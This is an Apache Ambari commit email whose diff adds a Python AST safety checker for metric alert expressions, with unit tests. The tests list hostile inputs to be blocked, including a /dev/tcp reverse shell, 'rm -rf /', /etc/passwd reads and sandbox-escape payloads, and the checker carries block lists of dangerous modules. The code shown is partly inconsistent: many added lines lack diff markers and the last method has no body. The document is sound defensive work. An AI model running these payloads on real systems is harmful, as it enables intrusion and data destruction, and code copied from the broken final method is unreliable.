This is an automated email from the ASF dual-hosted git repository.
jialiang pushed a commit to branch branch-2.7
in repository https://gitbox.apache.org/repos/asf/ambari.git
The following commit(s) were added to refs/heads/branch-2.7 by this push:
new c8cd397205 AMBARI-26202: Fix metrics issue (#3886)
c8cd397205 is described below
commit c8cd3972058f907c404166ef4252bd2e62338bea
Author: jialiang <[email protected]>
AuthorDate: Fri Nov 22 09:33:01 2024 +0800
AMBARI-26202: Fix metrics issue (#3886)
---
.../main/python/ambari_agent/alerts/ams_alert.py | 8 +
.../python/ambari_agent/alerts/metric_alert.py | 6 +
.../src/test/python/ambari_agent/TestASTChecker.py | 449 +++++++++++++++++++++
.../src/main/python/ambari_commons/ast_checker.py | 402 ++++++++++++++++++
4 files changed, 865 insertions(+)
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
index 4f59143189..09a77d884d 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/ams_alert.py
@@ -30,6 +30,7 @@ import uuid
from resource_management.libraries.functions.get_port_from_url import
get_port_from_url
from ambari_commons import inet_utils
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
logger = logging.getLogger(__name__)
@@ -210,9 +211,13 @@ def f(args):
self.interval = metric_info['interval'] # in minutes
self.app_id = metric_info['app_id']
self.minimum_value = metric_info['minimum_value']
+ self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
if 'value' in metric_info:
realcode = re.sub('(\{(\d+)\})', 'args[\g<2>][k]', metric_info['value'])
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("AmsMetric: Value expression {} is not safe,blocked
by checker".format(realcode))
+ raise Exception("AmsMetric: Value expression {} is not
safe".format(realcode))
self.custom_value_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_VALUE_TEMPLATE.format(realcode)
@@ -220,6 +225,9 @@ def f(args):
if 'compute' in metric_info:
realcode = metric_info['compute']
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("AmsMetric: compute expression {} is not safe,blocked
by checker".format(realcode))
+ raise Exception("AmsMetric: compute expression {} is not
safe".format(realcode))
self.custom_compute_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_COMPUTE_TEMPLATE.format(realcode)
exec code in self.custom_compute_module.__dict__
diff --git a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
index 94da8d33bf..b5924a1f5b 100644
--- a/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
+++ b/ambari-agent/src/main/python/ambari_agent/alerts/metric_alert.py
@@ -32,6 +32,7 @@ from
resource_management.libraries.functions.get_port_from_url import get_port_f
from resource_management.libraries.functions.curl_krb_request import
curl_krb_request
from ambari_commons import inet_utils
from ambari_commons.constants import AGENT_TMP_DIR
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
logger = logging.getLogger(__name__)
@@ -287,10 +288,15 @@ def f(args):
self.custom_module = None
self.property_list = jmx_info['property_list']
self.property_map = {}
+ self.safeChecker = ASTChecker([BlacklistRule()], use_blacklist=True)
if 'value' in jmx_info:
realcode = re.sub('(\{(\d+)\})', 'args[\g<2>]', jmx_info['value'])
+
+ if not self.safeChecker.is_safe_expression(realcode):
+ logger.exception("The expression {} is not safe,blocked by
checker".format(realcode))
+ raise Exception("The expression {} is not safe".format(realcode))
self.custom_module = imp.new_module(str(uuid.uuid4()))
code = self.DYNAMIC_CODE_TEMPLATE.format(realcode)
exec code in self.custom_module.__dict__
diff --git a/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
new file mode 100644
index 0000000000..6fd1f4f0e1
--- /dev/null
+++ b/ambari-agent/src/test/python/ambari_agent/TestASTChecker.py
@@ -0,0 +1,449 @@
+#!/usr/bin/env python2
+
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import unittest
+from ambari_commons.ast_checker import ASTChecker,BlacklistRule
+from ambari_agent.alerts.metric_alert import JmxMetric
+from ambari_agent.alerts.ams_alert import AmsMetric
+
class TestJmxMetric(unittest.TestCase):
  """Exercise JmxMetric expression compilation and evaluation."""

  def test_jmx_metric_calculation(self):
    jmx_info = {
      'property_list': ['a/b', 'c/d'],
      'value': '({0} + {1}) / 100.0'
    }
    metric = JmxMetric(jmx_info)
    result = metric.calculate([50, 50])
    self.assertEqual(result, 1.0)

  def test_jmx_metric_with_complex_calculation(self):
    # NOTE(review): the expression reads four values ({0}..{3}) although
    # property_list declares only two; calculate() is handed four values directly.
    jmx_info = {
      'property_list': ['x/y', 'z/w'],
      'value': 'max({0}, {2}) / min({1}, {3}) * 100.0'
    }
    metric = JmxMetric(jmx_info)
    result = metric.calculate([100, 50, 200, 25])
    self.assertEqual(result, 800.0)

  def test_jmx_metric_with_string_manipulation(self):
    jmx_info = {
      'property_list': ['str1/value', 'str2/value'],
      'value': "len({0}) + len({1})"
    }
    metric = JmxMetric(jmx_info)
    result = metric.calculate(['hello', 'world'])
    self.assertEqual(result, 10)

  def test_jmx_metric_with_unsafe_operation(self):
    jmx_info = {
      'property_list': ['a/b'],
      'value': "__import__('os').system('echo hacked')"
    }

    with self.assertRaises(Exception) as context:
      JmxMetric(jmx_info)
    # Checking the message keeps an unrelated constructor failure from
    # satisfying the test; only a rejection by the AST checker should pass.
    self.assertIn('not safe', str(context.exception))
+
class TestAmsMetric(unittest.TestCase):
  """Exercise AmsMetric with well-formed and with malicious expressions."""

  @staticmethod
  def _metric_info(metric_list, **expression):
    """
    Build a minimal AMS metric definition.

    :param metric_list: value stored under 'metric_list'.
    :param expression: 'value=...' and/or 'compute=...', merged into the dict.
    :return: the metric definition dict passed to AmsMetric.
    """
    metric_info = {
      'metric_list': metric_list,
      'interval': 5,
      'app_id': 'test_app',
      'minimum_value': 0,
    }
    metric_info.update(expression)
    return metric_info

  def _assert_blocked(self, value):
    """Assert that AmsMetric rejects the value expression as unsafe."""
    with self.assertRaises(Exception) as context:
      AmsMetric(self._metric_info(['a'], value=value))
    # Checking the message keeps an unrelated constructor failure from
    # satisfying the test; only a rejection by the AST checker should pass.
    self.assertIn('not safe', str(context.exception))

  # Safe test cases
  def test_safe_simple_calculation(self):
    metric = AmsMetric(self._metric_info(['a', 'b'], value='args[0][k] + args[1][k]'))
    result = metric.calculate_value([{'k': 10}, {'k': 20}])
    self.assertEqual(result, [30])

  def test_safe_complex_calculation(self):
    metric = AmsMetric(self._metric_info(
      ['x', 'y', 'z'],
      value='max(args[0][k], args[1][k]) / min(args[1][k], args[2][k]) * 100.0'))
    result = metric.calculate_value([{'k': 100}, {'k': 50}, {'k': 25}])
    self.assertEqual(result, [400.0])

  def test_safe_string_manipulation(self):
    metric = AmsMetric(self._metric_info(
      ['str1', 'str2'], value='len(str(args[0][k])) + len(str(args[1][k]))'))
    result = metric.calculate_value([{'k': 'hello'}, {'k': 'world'}])
    self.assertEqual(result, [10])

  def test_safe_list_comprehension(self):
    metric = AmsMetric(self._metric_info(
      ['numbers'], value='sum([x for x in args[0][k] if x > 5])'))
    result = metric.calculate_value([{'k': [1, 6, 2, 7, 3, 8]}])
    self.assertEqual(result, [21])

  def test_safe_dict_manipulation(self):
    metric = AmsMetric(self._metric_info(['data'], value='sum(args[0][k].values())'))
    result = metric.calculate_value([{'k': {'a': 1, 'b': 2, 'c': 3}}])
    self.assertEqual(result, [6])

  def test_safe_conditional_expression(self):
    metric = AmsMetric(self._metric_info(
      ['x', 'y'], value='args[0][k] if args[0][k] > args[1][k] else args[1][k]'))
    result = metric.calculate_value([{'k': 10}, {'k': 20}])
    self.assertEqual(result, [20])

  def test_safe_boolean_operations(self):
    metric = AmsMetric(self._metric_info(
      ['a', 'b', 'c'],
      value='int(args[0][k] > 0 and args[1][k] < 10 or args[2][k] == 5)'))
    result = metric.calculate_value([{'k': 1}, {'k': 5}, {'k': 5}])
    self.assertEqual(result, [1])

  def test_safe_compute_mean(self):
    metric = AmsMetric(self._metric_info(['numbers'], compute='mean'))
    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
    self.assertEqual(result, 3)

  def test_safe_compute_standard_deviation(self):
    # NOTE(review): 1.4142 is the *population* standard deviation of 1..5; the
    # sample standard deviation is ~1.5811. Confirm which one
    # 'sample_standard_deviation' is meant to compute.
    metric = AmsMetric(self._metric_info(['numbers'], compute='sample_standard_deviation'))
    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
    self.assertAlmostEqual(result, 1.4142, places=4)

  def test_safe_compute_count(self):
    metric = AmsMetric(self._metric_info(['numbers'], compute='count'))
    result = metric.calculate_compute([1, 2, 3, 4, 5])  # Pass a flat list
    self.assertEqual(result, 5)

  # Unsafe test cases
  def test_unsafe_import(self):
    self._assert_blocked("__import__('os').system('echo hacked')")

  def test_unsafe_eval(self):
    self._assert_blocked("eval('2 + 2')")

  def test_unsafe_exec(self):
    self._assert_blocked("exec('x = 5')")

  def test_unsafe_open_file(self):
    self._assert_blocked("open('/etc/passwd', 'r').read()")

  def test_unsafe_subprocess(self):
    self._assert_blocked("__import__('subprocess').call(['ls', '-l'])")

  def test_unsafe_globals(self):
    self._assert_blocked("globals()['__builtins__']")

  def test_unsafe_attribute_access(self):
    self._assert_blocked("args.__class__.__bases__[0].__subclasses__()")

  def test_unsafe_pickle(self):
    self._assert_blocked("__import__('pickle').loads(b'cos\\nsystem\\n(S\"echo hacked\"\\ntR.')")

  def test_unsafe_custom_function(self):
    self._assert_blocked("lambda: __import__('os').system('echo hacked')")

  def test_unsafe_builtin_override(self):
    self._assert_blocked("__builtins__.__dict__['print'] = lambda x: exec(x)")
+
class TestBlacklistASTChecker(unittest.TestCase):
  """Classify expressions with the blacklist-mode ASTChecker used by the alerts."""

  def setUp(self):
    self.checker = ASTChecker([BlacklistRule()], use_blacklist=True)

  def _assert_classified(self, expressions, expected_safe):
    """
    Check every expression and report all misclassified ones in a single failure.

    :param expressions: code strings to check.
    :param expected_safe: True if every expression must be accepted, False if
        every expression must be rejected.
    """
    failures = []
    for expr in expressions:
      try:
        if bool(self.checker.is_safe_expression(expr)) != expected_safe:
          failures.append(expr)
      except Exception as e:
        # Record a checker crash together with its input instead of aborting.
        failures.append('{} (raised {!r})'.format(expr, e))
    self.assertEqual([], failures, 'Expressions should be {}: {}'.format(
      'safe' if expected_safe else 'unsafe', failures))

  def test_safe_expressions(self):
    safe_expressions = [
      # Original safe expressions
      "mean",
      "1.5",
      "200",
      "args[0] * 100",
      "(args[1] - args[0])/args[1] * 100",
      "args[0]",
      "'[email protected]'",
      "calculate(args[0])",
      "args[0] + args[1]",
      "args[0] > args[1]",
      "args[0] and args[1]",
      "not args[0]",
      "-args[0]",
      "args[0] ** 2",
      "args[0] // 3",
      "args[0] % 2",
      "args[0][k]",
      "args[1][k]",
      "len(args[0])",
      "max(args[0][k], args[1][k])",
      "min(args[0][k], 10)",
      "args[0][k] + args[1][k]",
      "(args[1][k] - args[0][k]) / args[0][k] * 100 if args[0][k] != 0 else 0",
      "args[0][k] if args[0][k] > args[1][k] else args[1][k]",
      "(args[0][k] + args[1][k] + args[2][k]) / 3",
      "len(str(args[0][k]))",
      "int(args[0][k]) if args[0][k] is not None else 0",
      "args[0][k] * 2 if args[1][k] > 100 else args[0][k] / 2 if args[1][k] < 50 else args[0][k]",

      # Safe expressions from test_expressions
      "max(args[0], args[1])",
      "len([1, 2, 3])",
      "print('Hello, world!')",
      "x = [i for i in range(10)]",
      "def custom_function(x): return x * 2",
      "class CustomClass: pass",
      "try: 1/0\nexcept ZeroDivisionError: pass",
      "safe_function([1, 2, 3])",

      # Safe expressions from ams (those already listed above are not repeated)
      "sample_standard_deviation_percentage(args)",
      "sample_standard_deviation(args)",
      "mean(args)",
      "count(args)",
    ]
    self._assert_classified(safe_expressions, True)

  def test_unsafe_expressions(self):
    unsafe_expressions = [
      # Original unsafe expressions
      "__import__('os').system('bash -i >& /dev/tcp/127.0.0.1/18888 0>&1')",
      "open('/etc/passwd').read()",
      "exec('malicious code')",
      "exec('x = 5')",
      "eval('dangerous_function()')",
      "globals()['__builtins__']['__import__']('os').system('rm -rf /')",
      "getattr(__import__('os'), 'system')('echo hacked')",
      "(lambda: __import__('subprocess').call('ls'))()",
      "__class__.__base__.__subclasses__()[40]('/etc/passwd').read()",
      "import os; os.system('whoami')",
      "().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].system('ls')",
      "args[0].__class__.__bases__[0].__subclasses__()",
      "args[0].__dict__",
      "args[0].__globals__",

      # Unsafe expressions from test_expressions
      "with open('file.txt', 'r') as f: content = f.read()",
      "eval('1 + 1')",
      "os.system('echo hello')",
      "__import__('os').system('echo hello')",
      "obj._private_method()",
      "obj.__dict__",
      "_hidden_function()",
      "from module import _private_func",
      "import _private_module",

      # Additional unsafe expressions (exact duplicates removed)
      "import subprocess; subprocess.Popen('ls', shell=True)",
      "import pickle; pickle.loads(b'cos\\nsystem\\n(S\'echo hacked\'\\ntR.\')",
      "__import__('os').popen('ls').read()",
      "import importlib; importlib.import_module('os').system('echo hacked')",
      "exec(\"__import__('os').system('echo hacked')\")",
      "(lambda f: f(f))(lambda f: __import__('os').system('echo hacked') or f(f))",
      "__builtins__.__dict__['__import__']('os').system('echo hacked')",
      "globals().get('__builtins__').get('__import__')('os').system('echo hacked')",
      "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('echo hacked')",
      "next(c for c in {}.__class__.__bases__[0].__subclasses__() if c.__name__ == 'Popen')(['echo', 'hacked'])",
      "type(''.join, (object,), {'__getitem__': lambda self, _: __import__('os').system('echo hacked')})()['']",
      "().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].system('echo hacked')",
      "getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(getattr(__import__('os'), 'path'), 'abspath'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__'), '__globals__'), '__builtins__'), '__import__')('os').system('echo hacked')",
      "(__builtins__.__dict__['__import__']('functools').reduce(lambda f, n: getattr(f, n), ['__globals__', '__builtins__', '__import__'], __import__('os')))('os').system('echo hacked')",
      "(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n][0]): fc('Popen')(['echo', 'hacked']))()",
      "(lambda x: ().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[x])('sys').modules['os'].system('echo hacked')",
      "getattr(__import__('ctypes'), 'windll', __import__('ctypes').cdll).LoadLibrary('libc.so.6').system('echo hacked')",
      "next(filter(lambda x: x.__name__ == 'Popen', ().__class__.__bases__[0].__subclasses__()))(['echo', 'hacked'])",
      "(__import__('codecs').decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2VjaG8gaGFja2VkJyk=', 'base64'))",
      "compile('__import__(\\'os\\').system(\\'echo hacked\\')', '<string>', 'exec')",
      "locals()['__builtins__']['__import__']('os').system('echo hacked')",
      "vars(__builtins__)['__import__']('os').system('echo hacked')",
      "(lambda x: x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['eval']('__import__(\\'os\\').system(\\'echo hacked\\')')",
      "(lambda x: x.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values())(0)[13]['__import__']('os').system('echo hacked')",

      "import os",
      "open('file.txt', 'w')",
      "exec('print(\"Hello\")')",
      "__import__('os').system('ls')",
      "globals()['__builtins__']['eval']('1+1')",
    ]
    self._assert_classified(unsafe_expressions, False)

  def test_syntax_error(self):
    expr = "(args[1] - args[0])/{args[1] * 100"
    self.assertFalse(self.checker.is_safe_expression(expr),
                     "Expression with syntax error should be unsafe: {}".format(expr))
+
diff --git a/ambari-common/src/main/python/ambari_commons/ast_checker.py
b/ambari-common/src/main/python/ambari_commons/ast_checker.py
new file mode 100644
index 0000000000..9839b3b09f
--- /dev/null
+++ b/ambari-common/src/main/python/ambari_commons/ast_checker.py
@@ -0,0 +1,402 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/env python2
+'''
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import ast
+from abc import ABCMeta, abstractmethod
+
+import logging
+logger = logging.getLogger(__name__)
+"""
+This module provides a framework for checking the safety of Python code
expressions.
+It includes abstract base classes for defining rule templates, concrete rule
implementations,
+and an AST checker that applies these rules to validate code safety.
+"""
+
class RuleTemplate(object):
  """
  Interface for the rule sets consumed by ASTChecker.

  A concrete rule declares which variable names, callable names and AST node
  classes it permits, plus optional predicates keyed by AST node class.
  """
  __metaclass__ = ABCMeta

  @abstractmethod
  def allowed_names(self):
    """Return the set of variable names this rule permits."""

  @abstractmethod
  def allowed_functions(self):
    """Return the set of function names this rule permits calling."""

  @abstractmethod
  def allowed_node_types(self):
    """Return the set of AST node classes this rule permits."""

  @abstractmethod
  def custom_checks(self):
    """Return a dict mapping an AST node class to a predicate its nodes must satisfy."""
+
class DefaultRule(RuleTemplate):
  """
  A default implementation of RuleTemplate that provides a basic set of allowed
  names, functions, node types, and no custom checks.
  """

  # AST node classes are resolved by name because the ast module differs between
  # interpreters: Python 2.7 has Num/Str/Index but no Constant, while Python 3.8+
  # parses every literal as Constant (Num/Str are deprecated there and removed
  # in later releases). Names missing from the running interpreter are skipped.
  _ALLOWED_NODE_TYPE_NAMES = (
    'Num', 'Str', 'Constant',
    'Name', 'Call', 'BinOp', 'UnaryOp',
    'Compare', 'BoolOp', 'Subscript', 'Index',
    'Load', 'Expression',
    'Add', 'Sub', 'Mult', 'Div', 'FloorDiv', 'Mod', 'Pow',
    'UAdd', 'USub',
    'Eq', 'NotEq', 'Lt', 'LtE', 'Gt', 'GtE',
    'And', 'Or', 'Not',
    'Lambda', 'IfExp', 'If', 'Return', 'Continue',
  )

  def allowed_names(self):
    """Allow only 'args' as a variable name."""
    return {'args'}

  def allowed_functions(self):
    """Allow a limited set of safe functions."""
    return {'calculate', 'max', 'min', 'len'}

  def allowed_node_types(self):
    """Return the AST node classes from _ALLOWED_NODE_TYPE_NAMES available in this interpreter."""
    return set(getattr(ast, name) for name in self._ALLOWED_NODE_TYPE_NAMES
               if hasattr(ast, name))

  def custom_checks(self):
    """No custom checks for the default rule."""
    return {}
+
class ASTChecker(object):
  """
  Check the safety of Python code by analyzing its Abstract Syntax Tree (AST).

  Two modes are supported:
    * whitelist mode (use_blacklist=False): every node must be one of the
      rules' allowed node types, every name and called function must be
      explicitly allowed, and the rules' custom checks must pass;
    * blacklist mode (use_blacklist=True): only the rules' custom checks are
      applied, so anything they do not reject is accepted.
  """

  def __init__(self, rules, use_blacklist=False):
    """
    Initialize the ASTChecker with a list of rules and the checking mode.

    :param rules: list of rule objects. Blacklist mode only calls their
        custom_checks(); whitelist mode also calls allowed_names(),
        allowed_functions() and allowed_node_types().
    :param use_blacklist: If True, use blacklist mode; otherwise, use whitelist mode.
    """
    self.rules = rules
    self.use_blacklist = use_blacklist
    if not use_blacklist:
      self._compile_rules()

  def _compile_rules(self):
    """Merge all rules into combined sets of allowed constructs (whitelist mode)."""
    self.allowed_names = set().union(*(rule.allowed_names() for rule in self.rules))
    self.allowed_functions = set().union(*(rule.allowed_functions() for rule in self.rules))
    self.allowed_node_types = set().union(*(rule.allowed_node_types() for rule in self.rules))

    # When several rules check the same node type, a node must pass all of them.
    self.custom_checks = {}
    for rule in self.rules:
      for node_type, check_func in rule.custom_checks().items():
        if node_type in self.custom_checks:
          original_func = self.custom_checks[node_type]
          # Bind both functions as defaults so each combined lambda keeps its own pair.
          self.custom_checks[node_type] = \
            lambda node, of=original_func, nf=check_func: of(node) and nf(node)
        else:
          self.custom_checks[node_type] = check_func

  @staticmethod
  def _parse(code):
    """Parse code as a single expression, falling back to statement mode."""
    try:
      return ast.parse(code, mode='eval')
    except SyntaxError:
      return ast.parse(code, mode='exec')

  def is_safe_expression(self, code):
    """
    Check if the given code string is safe according to the defined rules.

    The string is parsed as an expression first and, if that is a syntax error,
    as a sequence of statements. Anything that cannot be parsed or fully
    checked is reported as unsafe.

    :param code: The code string to check.
    :return: True if the code is safe, False otherwise.
    """
    try:
      tree = self._parse(code)
    except SyntaxError:
      logger.info("Syntax error in expression: {}".format(code))
      return False
    except (TypeError, ValueError, RuntimeError) as e:
      # TypeError: not a string (or NUL bytes on Python 2); ValueError: NUL
      # bytes on Python 3 < 3.12; RuntimeError: recursion limit while parsing.
      logger.info("Cannot parse expression {!r}: {}".format(code, e))
      return False

    try:
      return self.is_safe_node(tree)
    except RuntimeError:
      # Deeply nested input exhausts the recursion limit of the walk; fail closed.
      logger.info("Expression too deeply nested to check: {!r}".format(code))
      return False

  def is_safe_node(self, node):
    """
    Recursively check if an AST node and all its children are safe.

    Dispatches on the mode chosen in __init__: whitelist mode uses
    _is_safe_node_whitelist, blacklist mode applies the rules' custom checks.

    :param node: The AST node to check.
    :return: True if the node and all its children are safe, False otherwise.
    """
    if not self.use_blacklist:
      return self._is_safe_node_whitelist(node)

    if not self._is_safe_node_blacklist(node):
      return False
    for child in ast.iter_child_nodes(node):
      if not self.is_safe_node(child):
        return False
    return True

  def _is_safe_node_blacklist(self, node):
    """
    Check a single node (not its children) against every rule's custom checks.

    :param node: The AST node to check.
    :return: True if no custom check rejects the node, False otherwise.
    """
    for rule in self.rules:
      for node_type, check_func in rule.custom_checks().items():
        if isinstance(node, node_type) and not check_func(node):
          return False
    return True

  def _is_safe_node_whitelist(self, node):
    """
    Check if a node and its children are safe using whitelist rules.

    :param node: The AST node to check.
    :return: True if the node and its children are allowed, False otherwise.
    """
    if not isinstance(node, tuple(self.allowed_node_types)):
      logger.info("Node type not allowed: {}".format(type(node).__name__))
      return False

    if isinstance(node, ast.Name):
      if node.id not in self.allowed_names and node.id not in self.allowed_functions:
        logger.info("Name not allowed: {}".format(node.id))
        return False
    elif isinstance(node, ast.Call):
      # Only direct calls of allowed function names; no method calls.
      if not isinstance(node.func, ast.Name) or node.func.id not in self.allowed_functions:
        logger.info("Function call not allowed: {}".format(ast.dump(node.func)))
        return False

    node_type = type(node)
    if node_type in self.custom_checks:
      if not self.custom_checks[node_type](node):
        logger.info("Custom check failed for node: {}".format(ast.dump(node)))
        return False

    # Recursively check child nodes
    for child in ast.iter_child_nodes(node):
      if not self.is_safe_node(child):
        return False

    return True

  def print_ast_tree(self, code):
    """
    Print the AST tree of the given code string (parsed in statement mode).

    :param code: The code string to visualize.
    """
    try:
      tree = ast.parse(code, mode='exec')
      logger.info("AST Tree:")
      self._print_node(tree, "", True)
    except SyntaxError:
      logger.info("Syntax error in expression: {}".format(code))

  def _print_node(self, node, prefix, is_last):
    """
    Recursively print an AST node and its children to stdout.

    :param node: The AST node to print.
    :param prefix: The prefix string for the current line.
    :param is_last: Whether this is the last child of its parent.
    """
    # Single-argument print(...) behaves the same on Python 2 and Python 3.
    print(prefix + ("└── " if is_last else "├── ") + type(node).__name__)

    # Prepare the prefix for child nodes
    child_prefix = prefix + ("    " if is_last else "│   ")

    fields = list(ast.iter_fields(node))

    # Print fields and child nodes
    for i, (name, value) in enumerate(fields):
      is_last_field = i == len(fields) - 1

      if isinstance(value, ast.AST):
        self._print_node(value, child_prefix, is_last_field)
      elif isinstance(value, list) and value and isinstance(value[0], ast.AST):
        print(child_prefix + ("└── " if is_last_field else "├── ") + name + ":")
        for j, item in enumerate(value):
          self._print_node(item, child_prefix + "    ", j == len(value) - 1)
      else:
        print(child_prefix + ("└── " if is_last_field else "├── ") + "{}: {}".format(name, value))
+
class BlacklistRule(object):
  """
  A rule that defines a blacklist of dangerous functions, modules, attributes
  and constructs, and provides custom checks rejecting them.

  It only provides custom_checks(), which is all ASTChecker consults in
  blacklist mode; it is not a RuleTemplate.
  """

  def __init__(self):
    """Initialize the blacklists of dangerous names, modules and attributes."""
    self.blacklist = {
      'eval', 'exec', 'compile', '__import__', 'open', 'file',
      'os.system', 'subprocess.call', 'subprocess.Popen',
      'pickle.loads', 'pickle.load', 'marshal.loads',
      'builtins', '__builtins__', 'globals', 'locals', 'vars', 'getattr',
      'setattr', 'delattr', 'hasattr', 'importlib', 'importlib.import_module',
      'os', 'subprocess', 'sys', 'shutil', 'pty'
    }
    # Importing any of these, or any submodule of them, is rejected.
    self.dangerous_modules = {
      'os', 'subprocess', 'sys', 'importlib', 'pickle', 'marshal',
      'shutil', 'pty', 'ctypes', 'commands', 'posix', 'imp', 'builtins'
    }
    # Attributes without a leading underscore that still expose globals,
    # frames or code objects (Python 2 function/method aliases and
    # frame/generator/coroutine/traceback fields). Without this set they
    # bypass the leading-underscore rule, e.g.
    # (lambda: 0).func_globals['__builtins__'].
    self.dangerous_attributes = {
      'func_globals', 'func_code', 'func_closure', 'func_defaults',
      'im_func', 'im_self', 'im_class',
      'gi_frame', 'gi_code', 'cr_frame', 'cr_code', 'ag_frame', 'ag_code',
      'f_globals', 'f_locals', 'f_builtins', 'f_back', 'f_code',
      'tb_frame', 'tb_next'
    }

  def custom_checks(self):
    """Return a dictionary of custom check functions for specific AST node types."""
    checks = {
      ast.Name: self._check_name,
      ast.Call: self._check_call,
      ast.Attribute: self._check_attribute,
      ast.Import: self._check_import,
      ast.ImportFrom: self._check_importfrom,
      ast.Subscript: self._check_subscript,
      ast.Module: self._check_module,
    }
    # ast.Exec exists only on Python 2, where `exec` is a statement.
    exec_node_type = getattr(ast, 'Exec', None)
    if exec_node_type is not None:
      checks[exec_node_type] = self._check_exec
    return checks

  def _check_exec(self, node):
    """Reject every Python 2 exec statement."""
    return False

  def _check_name(self, node):
    """Check if a Name node is not in the blacklist and doesn't start with an underscore."""
    if isinstance(node, ast.Name):
      return node.id not in self.blacklist and not node.id.startswith('_')
    return True

  def _check_call(self, node):
    """Check if a function call is safe."""
    if isinstance(node.func, ast.Name):
      return node.func.id not in self.blacklist and not node.func.id.startswith('_')
    elif isinstance(node.func, ast.Attribute):
      return self._check_attribute(node.func)
    return True

  def _check_attribute(self, node):
    """Check if an attribute access is safe."""
    full_name = self._get_attribute_name(node)
    return (full_name not in self.blacklist
            and not node.attr.startswith('_')
            and node.attr not in self.dangerous_attributes)

  def _is_dangerous_module(self, module_name):
    """True if module_name is, or lives under, a dangerous or private module."""
    parts = module_name.split('.')
    return parts[0] in self.dangerous_modules or any(part.startswith('_') for part in parts)

  def _check_import(self, node):
    """Check if an import statement is safe (dotted names are checked by their root)."""
    return all(not self._is_dangerous_module(alias.name) for alias in node.names)

  def _check_importfrom(self, node):
    """Check if an import from statement is safe."""
    # node.module is None for relative imports such as `from . import x`.
    if node.module and self._is_dangerous_module(node.module):
      return False
    return all(alias.name not in self.blacklist and not alias.name.startswith('_')
               for alias in node.names)

  def _check_subscript(self, node):
    """Check if a subscript operation is safe."""
    if isinstance(node.value, ast.Name) and node.value.id in self.blacklist:
      return False
    if isinstance(node.value, ast.Attribute) and not self._check_attribute(node.value):
      return False
    # x['__builtins__'] reaches the same objects as the blocked underscore
    # attributes, so literal string keys follow the same rule.
    key = self._string_literal(self._subscript_key(node))
    return key is None or not key.startswith('_')

  @staticmethod
  def _subscript_key(node):
    """Return the index expression of a Subscript (unwrapping ast.Index where used)."""
    key = node.slice
    index_type = getattr(ast, 'Index', None)
    if index_type is not None and isinstance(key, index_type):
      key = key.value
    return key

  @staticmethod
  def _string_literal(node):
    """Return the text of a string literal node, or None for anything else."""
    constant_type = getattr(ast, 'Constant', None)
    if constant_type is not None and isinstance(node, constant_type):
      value = node.value
    else:
      value = getattr(node, 's', None)  # ast.Str on Python 2 and Python 3 < 3.8
    if isinstance(value, (type(''), type(u''))):
      return value
    return None

  def _check_module(self, node):
    """Check if a module is safe by examining its imports and expression statements."""
    for stmt in node.body:
      if isinstance(stmt, ast.Import):
        if not self._check_import(stmt):
          return False
      elif isinstance(stmt, ast.ImportFrom):
        if not self._check_importfrom(stmt):
          return False
      elif isinstance(stmt, ast.Expr):
        if not self.is_safe_node(stmt.value):
          return False
    return True

  def _get_attribute_name(self, node):
    """Get the dotted name of an attribute; only Name/Attribute bases are included."""
    if isinstance(node.value, ast.Name):
      return "{}.{}".format(node.value.id, node.attr)
    elif isinstance(node.value, ast.Attribute):
      return "{}.{}".format(self._get_attribute_name(node.value), node.attr)
    return node.attr

  def is_safe_node(self, node):
    """
    Check if a node and all its children are safe.

    Each check only runs on nodes of its own type. Running every check on every
    node would make e.g. _check_call read node.func on a Name and raise
    AttributeError.
    """
